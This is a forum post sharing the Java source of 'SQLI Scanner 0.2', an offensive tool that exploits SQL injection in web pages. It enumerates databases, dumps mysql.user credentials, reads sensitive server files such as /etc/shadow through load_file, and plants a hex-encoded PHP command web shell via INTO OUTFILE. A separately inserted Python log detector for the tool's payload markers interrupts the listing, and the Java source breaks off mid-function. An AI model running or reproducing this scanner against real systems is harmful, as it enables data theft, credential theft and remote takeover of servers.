[Java] SQLI Scanner 0.2

Started by BigBear, January 21, 2013, 09:33:17 PM



January 21, 2013, 09:33:17 PM. Last modified: April 18, 2013, 01:09:38 PM by Expermicid
Complete translation of this simple program for scanning pages vulnerable to SQLi, called k0bra, which I had written some time ago in Perl.

With the following options:

  • Check vulnerability
  • Find the number of columns
  • Automatically find the column number that prints data
  • Show tables
  • Show columns
  • Show databases
  • Show tables of another DB
  • Show columns of a table of another DB
  • Show users from mysql.user
  • Search for files using load_file
  • Show a file using load_file
  • Show values
  • Show information about the DB
  • Create a shell using outfile
  • Everything is saved in ordered logs

    An example of use:

    Code: java


    -- == SQLI Scanner 0.2 == --


    [+] Page :
    http://localhost/sql.php?id=

    [+] Checking ...

    [+] Scanning ...

    [Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
    [Limit] : The site has 3 columns
    [Data] : The number 1 print data

    -- == OPTIONS == --

    --== information_schema.tables ==--
    [1] : Show tables
    [2] : Show columns
    [3] : Show DBS
    [4] : Show tables with other DB
    [5] : Show columns with other DB
    --== mysql.user ==--
    [6] : Show users
    --== Others ==--
    [7] : Fuzzing files with load_file
    [8] : Read a file with load_file
    [9] : Dump
    [10] : Informacion of the server
    [11] : Create a shell with into outfile
    [12] : Show Log
    [13] : Exit

    [Option] :
    10

    [+] Searching informaion ...

    [+] DB Version : 5.5.20-log
    [+] DB Name : hackman
    [+] Username : root@localhost
    [+] information_schema : on
    [+] mysqluser : on
    [-] load_file : off

    [+] Finished
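
Added example, not part of the original post or of the tool itself: a defender-side Python script that flags this scanner's request patterns in web-server access logs, keyed on the marker strings the Java source builds into its payloads (0x4b30425241 is "K0BRA", char(69,82,84,79,82,56,53,52) is "ERTOR854", RATSXPDOWN is the column probe). The log lines are constructed, and the hex form of RATSXPDOWN assumes the tool's encodehex() emits 0x-prefixed hex, which the truncated source does not show.

```python
"""Flag SQLI Scanner 0.2 request patterns in access logs (added detection example)."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined-style access log line; the sample lines below are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# One regex per scanner stage, matched against the URL-decoded request path.
# 0x4b30425241 = "K0BRA" (with optional "1"/"2" suffix used for mysql.user),
# char(69,82,84,79,82,56,53,52) = "ERTOR854" (load_file wrapper),
# 0x524154535850444f574e = "RATSXPDOWN" (assumption: encodehex() emits 0x-hex).
SIGNATURES = {
    "column_error_probe": re.compile(r"union\s+select\s+666\s*--", re.I),
    "column_count_probe": re.compile(r"(?:0x524154535850444f574e|RATSXPDOWN)\d", re.I),
    "k0bra_marker": re.compile(r"0x4b30425241(?:3[12])?", re.I),
    "ertor854_marker": re.compile(r"char\(69,82,84,79,82,56,53,52\)", re.I),
    "load_file": re.compile(r"load_file\s*\(", re.I),
    "into_outfile": re.compile(r"into\s+outfile", re.I),
    "mysql_user_read": re.compile(r"from\s+mysql\.user", re.I),
    "schema_enum": re.compile(r"from\s+information_schema\.", re.I),
}

# Constructed sample log: one scanner session (203.0.113.7) and one benign client.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jan/2013:21:33:17 -0300] "GET /sql.php?id=-1+union+select+666-- HTTP/1.1" 200 811 "-" "Java/1.7.0_11"',
    '203.0.113.7 - - [21/Jan/2013:21:33:18 -0300] "GET /sql.php?id=-1+union+select+0x524154535850444f574e31,0x524154535850444f574e32,0x524154535850444f574e33 HTTP/1.1" 200 902 "-" "Java/1.7.0_11"',
    '203.0.113.7 - - [21/Jan/2013:21:33:19 -0300] "GET /sql.php?id=-1+union+select+unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241))),2,3+from+information_schema.tables-- HTTP/1.1" 200 903 "-" "Java/1.7.0_11"',
    '203.0.113.7 - - [21/Jan/2013:21:33:20 -0300] "GET /sql.php?id=-1+union+select+unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764),char(69,82,84,79,82,56,53,52)))),2,3 HTTP/1.1" 200 1433 "-" "Java/1.7.0_11"',
    '198.51.100.4 - - [21/Jan/2013:21:34:02 -0300] "GET /sql.php?id=42 HTTP/1.1" 200 811 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [21/Jan/2013:21:34:05 -0300] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one access-log line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_path(path):
    """Return the scanner stages whose signature appears in the decoded path."""
    decoded = unquote_plus(path)  # the tool sends '+' for spaces
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines):
    """Return (ip, ts, status, path, stages) for every request that matches a stage."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        stages = classify_path(rec["path"])
        if stages:
            findings.append((rec["ip"], rec["ts"], rec["status"], rec["path"], stages))
    return findings


def attackers(findings, min_stages=2):
    """Group by client; a client that hits >= min_stages distinct stages is flagged."""
    seen = defaultdict(set)
    for ip, _ts, _status, _path, stages in findings:
        seen[ip].update(stages)
    return {ip: sorted(st) for ip, st in seen.items() if len(st) >= min_stages}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, ts, status, _path, stages in hits:
        print(f"{ts} {ip} {status} {', '.join(stages)}")
    for ip, stages in attackers(hits).items():
        print(f"[!] {ip} matched {len(stages)} scanner stages: {' '.join(stages)}")
```

The first stage only works when the application echoes the MySQL error text ("The used SELECT statements have a different number of columns") into the page; suppressing database errors and binding `id` as an integer parameter removes both the oracle and the injection.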
    The code is as follows:

    Code: java

    // -- == -- == -- == ---- ==
    // SQLI Scanner 0.2       ||
    // -- == -- == -- == ---- ==
    // (C) Doddy Hackman 2013 ||
    // -- == -- == -- == ---- ==

    import java.util.Scanner;
    import java.io.*;
    import java.net.*;

    import java.util.regex.Matcher;
    import java.util.regex.Pattern;

    public class Main {

        public static void main(String[] args) throws Exception {

            String target;
            Scanner host = new Scanner(System.in);

            installer();

            System.out.println("\n\n-- == SQLI Scanner 0.2 == --\n\n");
            System.out.println("[+] Page : ");
            target = host.nextLine();
            scan(target);

    //schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers");
    //getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman");
    //getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers");
    //mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password");
    //fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3");
    //openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt");
    //intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/");

        }

        private static void manejo(String urla) throws Exception {

            while (true) {
                System.out.println("\n-- == OPTIONS == --\n");
                System.out.println("--== information_schema.tables ==--");
                System.out.println("[1] : Show tables");
                System.out.println("[2] : Show columns");
                System.out.println("[3] : Show DBS");
                System.out.println("[4] : Show tables with other DB");
                System.out.println("[5] : Show columns with other DB");
                System.out.println("--== mysql.user ==--");
                System.out.println("[6] : Show users");
                System.out.println("--== Others ==--");
                System.out.println("[7] : Fuzzing files with load_file");
                System.out.println("[8] : Read a file with load_file");
                System.out.println("[9] : Dump");
                System.out.println("[10] : Informacion of the server");
                System.out.println("[11] : Create a shell with into outfile");
                System.out.println("[12] : Show Log");
                System.out.println("[13] : Exit");

                int op;
                Scanner host = new Scanner(System.in);
                System.out.println("\n[Option] :");
                op = host.nextInt();

                if (op == 1) {
                    schematables(urla);
                    continuar();
                } else if (op == 2) {

                    String coler;

                    Scanner a = new Scanner(System.in);
                    System.out.println("\n[+] Table : ");
                    coler = a.nextLine();

                    schemacolumns(urla, coler);
                    continuar();

                } else if (op == 3) {
                    getdbs(urla);
                    continuar();
                } else if (op == 4) {

                    String tabler;

                    Scanner a = new Scanner(System.in);
                    System.out.println("\n[+] DB : ");
                    tabler = a.nextLine();

                    getablesbydb(urla, tabler);
                    continuar();

                } else if (op == 5) {

                    String dber;
                    String tablerx;

                    Scanner a = new Scanner(System.in);
                    System.out.println("\n[+] DB : ");
                    dber = a.nextLine();

                    Scanner b = new Scanner(System.in);
                    System.out.println("\n[+] Table : ");
                    tablerx = a.nextLine();

                    getcolbydb(urla, dber, tablerx);
                    continuar();

                } else if (op == 6) {

                    mysqluser(urla);
                    continuar();

                } else if (op == 7) {

                    fuzzfiles(urla);
                    continuar();

                } else if (op == 8) {

                    String ar;

                    Scanner f = new Scanner(System.in);
                    System.out.println("\n[+] File : ");
                    ar = f.nextLine();

                    openfile(urla, ar);
                    continuar();

                } else if (op == 9) {

                    String a;
                    String b;
                    String c;

                    Scanner m = new Scanner(System.in);
                    System.out.println("\n[+] Table : ");
                    a = m.nextLine();

                    Scanner n = new Scanner(System.in);
                    System.out.println("\n[+] Column 1 : ");
                    b = n.nextLine();

                    Scanner l = new Scanner(System.in);
                    System.out.println("\n[+] Column 2 : ");
                    c = l.nextLine();

                    dumper(urla, a, b, c);

                    continuar();

                } else if (op == 10) {

                    details(urla);
                    continuar();

                } else if (op == 11) {

                    String b;
                    String c;

                    Scanner m = new Scanner(System.in);
                    System.out.println("\n[+] Full Path Discloure : ");
                    b = m.nextLine();

                    Scanner n = new Scanner(System.in);
                    System.out.println("\n[+] Directory to test : ");
                    c = n.nextLine();

                    intofile(urla, b, c);
                    continuar();

                } else if (op == 12) {

                    String ruta;

                    URL h = new URL(urla);

                    ruta = System.getProperty("user.dir") + "/logs/" + h.getHost() + ".txt";

                    System.out.println("\n[+] Check logs in : " + ruta);
                    continuar();

                } else if (op == 13) {
                    System.out.println("\n-- == (C) Doddy Hackman 2013 == --");
                    continuar();
                    System.exit(1);
                } else {
                    System.out.println("\n[-] Bad Option\n");
                    continuar();
                }

            }
        }

        private static void continuar() throws Exception {
            System.out.println("\n[+] Finished\n");
            Scanner chau = new Scanner(System.in);
            chau.nextLine();
        }

        private static void installer() throws Exception {

            File crear = new File("logs");

            if (!crear.isDirectory()) {
                crear.mkdirs();
            }

        }

        private static void intofile(String urla, String fpd, String dir) throws Exception {

            String linea;
            String lugar;
            String lugardos;
            String webtest;
            String web1;
            String formandoweb;
            String code;

            linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e";
            lugar = fpd + "/cmd.php";
            lugardos = dir + "/cmd.php";

            URL h = new URL(urla);

            System.out.println("\n[+] Checking ...\n");

            webtest = "http://" + h.getHost() + lugardos;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", linea);
            formandoweb = web1 + "+into+outfile+'" + lugar + "'--";

            code = toma(formandoweb);
            code = toma(webtest);

            uno = Pattern.compile("Mini Shell By Doddy");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[Shell UP] : " + webtest);
                savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n");
            } else {
                System.out.println("[-] Error");
            }

        }

        private static void openfile(String urla, String file) throws Exception {

            String archivo;
            String web1;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            archivo = encodehex(file);

            web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

            System.out.println("\n[+] Reading ...\n");

            code = toma(web1);

            uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
            dos = uno.matcher(code);

            if (dos.find()) {

                System.out.println("[+] File Found : " + file);
                System.out.println("\n[Source Start]\n");
                System.out.println(dos.group(1));
                System.out.println("\n[Source End]\n");

                savefile(urla, "\r\n" + "[+] File Found : " + file);
                savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                savefile(urla, dos.group(1));
                savefile(urla, "\r\n" + "[Source End]" + "\r\n");

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void fuzzfiles(String urla) throws Exception {

            String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", 
"/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", 
"/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", 
"C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"};
            String archivo;
            String web1;
            String code;

            Pattern uno = null;
            Matcher dos = null;

            System.out.println("\n[+] Searching files with load_file() ....\n");

            for (int count = 0; count < archivos.length; count++) {

                archivo = encodehex(archivos[count]);

                web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))");

                code = toma(web1);

                uno = Pattern.compile("ERTOR854(.*?)ERTOR854");
                dos = uno.matcher(code);

                if (dos.find()) {

                    System.out.println("[+] File Found : " + archivos[count]);
                    System.out.println("\n[Source Start]\n");
                    System.out.println(dos.group(1));
                    System.out.println("\n[Source End]\n");

                    savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]);
                    savefile(urla, "\r\n" + "[Source Start]" + "\r\n");
                    savefile(urla, dos.group(1));
                    savefile(urla, "\r\n" + "[Source End]" + "\r\n");

                }

            }

        }

        private static void dumper(String urla, String tabla, String col1, String col2) throws Exception {

            String web1;
            String web2;
            String code;
            int x;

            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");

            code = toma(web1 + "+from+" + tabla + "--");

            System.out.println("\n[+] Getting Values ...");

            uno = Pattern.compile("K0BRA(.*?)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Values Founds : " + dos.group(1));
                savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("\n[+] " + col1 + " : " + dos.group(1));
                        System.out.println("[+] " + col2 + " : " + dos.group(2));

                        savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1));
                        savefile(urla, "[+] " + col2 + " : " + dos.group(2));

                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void mysqluser(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;

            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");

            System.out.println("\n[+] Searching mysql.user ....");

            code = toma(web1 + "+from+mysql.user--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Users Found : " + dos.group(1));

                savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("\n[+] Host : " + dos.group(1));
                        System.out.println("[+] Username : " + dos.group(2));
                        System.out.println("[+] Password : " + dos.group(3));

                        savefile(urla, "\r\n" + "[+] Host : " + dos.group(1));
                        savefile(urla, "[+] Username : " + dos.group(2));
                        savefile(urla, "[+] Password : " + dos.group(3));

                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void getcolbydb(String urla, String db, String tab) throws Exception {

            String web1;
            String web2;
            String code;

            String dbf;
            String table;

            int x;

            Pattern uno = null;
            Matcher dos = null;

            dbf = encodehex(db);
            table = encodehex(tab);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

            System.out.println("\n[+] Getting Columns ....");

            code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Column Found : " + dos.group(1));
                        savefile(urla, "[+] Column Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }


        }

        private static void getablesbydb(String urla, String db) throws Exception {

            String web1;
            String web2;
            String code;
            String data;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            data = encodehex(db);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");

            System.out.println("\n[+] Getting Tables ....");

            code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Tables Found : " + dos.group(1) + "\n");
                savefile(urla, "\r\n" + "[DB] : " + db + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Table Found : " + dos.group(1));
                        savefile(urla, "[+] Table Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }


        }

        private static void getdbs(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");

            System.out.println("\n[+] Getting DBS ....");

            code = toma(web1 + "+from+information_schema.schemata--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] DBS Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] DB Found : " + dos.group(1));
                        savefile(urla, "[+] DB Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void schemacolumns(String urla, String nombre) throws Exception {

            String web1;
            String web2;
            String code;
            String tablexa;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            tablexa = encodehex(nombre);

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
            web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");

            System.out.println("\n[+] Getting columns ....");

            code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--");

            uno = Pattern.compile("K0BRA(.*)K0BRA");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("\n[+] Columns Found : " + dos.group(1) + "\n");

                savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n");

                int finals = Integer.parseInt(dos.group(1));

                for (x = 0; x <= finals; x = x + 1) {

                    code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--");

                    uno = Pattern.compile("K0BRA(.*)K0BRA");
                    dos = uno.matcher(code);

                    if (dos.find()) {
                        System.out.println("[+] Column Found : " + dos.group(1));
                        savefile(urla, "[+] Column Found : " + dos.group(1));
                    }

                }

            } else {
                System.out.println("[-] Not Found");
            }

        }

        private static void schematables(String urla) throws Exception {

            String web1;
            String web2;
            String code;
            int x;
            Pattern uno = null;
            Matcher dos = null;

            web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
